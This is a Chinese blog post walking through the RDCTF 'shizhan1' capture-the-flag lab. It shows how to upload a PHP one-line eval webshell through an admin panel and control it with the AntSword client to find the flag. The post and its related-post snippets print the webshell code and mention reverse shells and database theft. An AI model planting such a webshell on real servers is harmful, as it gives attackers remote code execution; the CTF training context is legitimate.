RDCTF shizhan1(靶机)

最新推荐文章于 2022-05-06 02:10:18 发布
最新推荐文章于 2022-05-06 02:10:18 发布
阅读量142 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50646540/article/details/108603603
版权

在已经登录后台的网站(靶机)上,上传含有小木马的文件,即安插卧底

  • 先编写一个含有木马的文件,可以用文本文档编写,之后将后缀名改为.php
    在这里插入图片描述木马内容:<?php @eval($_POST['11']);?>
    其中,11就相当于与卧底的接头暗号,可以任意更改,但是要记得,一会儿还有用。

  • 根据上一篇文章成功进入后台后,将小木马文件上传进网站,

  • (注意:要将木马文件放入你能找得到的地方。)

  • 在这里插入图片描述

  • 之后找到木马文件并下载。
    (注意:要去前端找小木马的文件)
    在这里插入图片描述单击下载了之后会显示一片空白,就将空白的页面的网址复制

  • 打开蚁剑

  • 右键添加数据,将网址粘贴上去,那个连接密码就是之前设置的密码。输入完成后就可以去找flag了
    -在这里插入图片描述
    至于flag的文件夹,只能慢慢找,根据一般的心理,这类数据可能会放在home的文件夹下,可以考虑去查一下

慕穆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之XXE Lab 1靶机渗透(base加密)
afei001
07-11 504
     练习环境      攻击机:kali      靶机:XXE Lab: 1      下载地址:https://download.vulnhub.com/xxe/XXE.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.3.0/16 IP At MAC Address Count Len MAC Vendor / Hostname ------------------------.
RDCTF SHIZHAN1
sweetie 的博客
09-14 160
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
10CTF01靶机渗透经历
qq_28241709的博客
11-14 669
123
CTF靶机 Blaster 笔记
z4yn:)的博客
06-28 379
Blaster 靶机描述 : 过去回忆的唤醒 复现CVE-2019-1388 靶机标签 :Windows,复现,特权 nmap扫一波 打开了两个端口 80 3389 访问80端口,用dirbuster扫目录 发现隐藏目录retro 访问发现类似博客,有一个wade用户 暴露了可能是密码的parzival(搞了好久没思路,问了朋友提示的 - -!) 尝试登录3389用xfreerdp,用了remmina和rdesktop都不行 xfreerdp /u:wa...
看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF
Aluxian_的博客
05-06 1203
Vulnhub靶机BOSSPLAYERSCTF1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:命令执行漏洞:③:反弹shell:④:suid提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是新手CTF得靶机还是老样子找到flag.t
shizhan_03_hadoop
12-15
1. HDFS(Hadoop Distributed File System):Hadoop的核心组件之一,用于分布式存储数据。学习者将了解如何使用HDFS API进行文件的上传、下载和操作。 2. MapReduce:Hadoop的并行计算模型,包括Map阶段和Reduce...
python_shizhan1:测试尝试通过git上传
03-03
在这个名为"python_shizhan1"的项目中,我们主要探讨的是如何利用Python进行实战项目的开发,并通过Git版本控制系统将项目上传到远程仓库,以便于版本管理和协作。这个项目特别适合那些正在参加测试学院自动化训练营...
leadnews-shizhan-master.zip
11-10
1. **README.md**:这是项目介绍的Markdown格式文件,通常会包含项目的目的、安装指南、使用方法和贡献者信息。 2. **requirements.txt**:列出项目运行所需的Python库及其版本,方便用户安装依赖。 3. **setup.py**...
项亮推荐系统shizhan的代码实现
02-16
项亮推荐系统shizhan的代码实现
中国电信天翼网关路由器后台登录useradmin用户忘记密码的解决方法默认密码管理员密码工作人员密码
热门推荐
SubStar的博客
08-01 8万+
电信天翼网关路由器忘记登录密码解决方法解决方法1解决方法2解决方法3解决方法4 忘记密码不用怕,以下方法可帮你解决。 解决方法 忘记密码别着急,可以通过以下方法来解决。 解决方法1 找到自家的路由器,一般情况下载路由器的背面有默认的账号密码,可以试下。这种情况适合于您从来没有修改过默认密码。 解决方法2 如果您已经修改过默认密码,又不记得新密码, 可以测试恢复出厂设置,让密码重置。路由器后面有个复位的按钮,长按住不动,一直按着等灯闪了之后再松手,路由器恢复出厂设置后再使用路由器背面的默认密码登录。 解决方
搭建并攻破discuz靶场(复现)并且盗取数据库
cainiao17441898的博客
06-30 2742
环境:Centos7,Win10 搭建环境: 一个新的Centos7虚拟机,需要搭建一个LAMP环境。 命令:yum -y install httpd mariadb-server mariadb php php-mysql(下载环境) 开启服务器和数据库 命令:systemctl start httpd,systemctl start mariadb 设置mysql数据库用户名密码:mysql -u root -p 123456 注意:这里我之前设置过密码,但是我忘了,淦! 解决办法: 漏洞概述: 这漏洞
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3500
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发现有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户 上到/login.php登录 登录上去后发现有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 615
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
rdctf-shizhan1借助蚁剑注入木马找到flag
qq_45970858的博客
09-14 1464
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
CTF之Kioptrix Level 1.1 靶机渗透(万能密码 命令注入)
afei001
04-16 981
练习环境     攻击机:kali     靶机:Kioptrix: Level 1.1 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...
从出口数据看中国经济新动能-华福证券.pdf
07-21
从出口数据看中国经济新动能-华福证券
java毕设&课设-ASP玩具交换网站设计与实现(源代码+论文).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
人工智能行业深度报告:WAIC2024,国产AI+应用“百花齐放”
07-21
2024年世界人工智能大会(WAIC 2024)上,国产AI+应用生态呈现“百花齐放”的局面 1. WAIC 2024:国产 AI+应用生态“百花齐放” 多家厂商携大模型及AI应用成果亮相展会,涵盖金山办公、科大讯飞、华为、商汤等知名企业。 OpenAI 禁令加速推动国产 AI 生态,国产大模型性能持续提升,缩小与海外差距。 预计未来国产 AI+行业应用将迎来“百花齐放”局面,商业空间加速打开。 2. 国产大模型加速迭代,代表性厂商生态加速构建 科大讯飞 发布星火 V4.0 大模型,全面对标 GPT-4 Turbo,多模态能力显著提升。 星火医疗和教育垂类模型能力升级,赋能行业应用落地。 推出星火企业智能平台,赋能企业构建岗位专属助手。 华为 发布盘古大模型 5.0 系列,包括不同参数规模,适用于多种场景。 推出盘古具身智能大模型,推动人形机器人技术升级。 盘古 5.0 赋能华为小艺升级,在多个行业落地应用。 商汤 发布“日日新 5.5”模型,交互体验对标 GPT-4o,多模态能力实现突破。 推出面向 C 端用户的可控人物视频生成模型 Vimi。 率先实现原生多模态大模型车端部署
HDTF-DATA.z09
最新发布
07-21
HDTF-DATA.z09
vxworks c++11shizhan
01-16
VxWorks是一种实时操作系统,它是为嵌入式系统设计的。它具有高度可靠性和稳定性,能够提供快速的响应和强大的实时性能。VxWorks C 11实现了C语言的最新标准,为开发者提供了更好的编程环境和工具支持。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值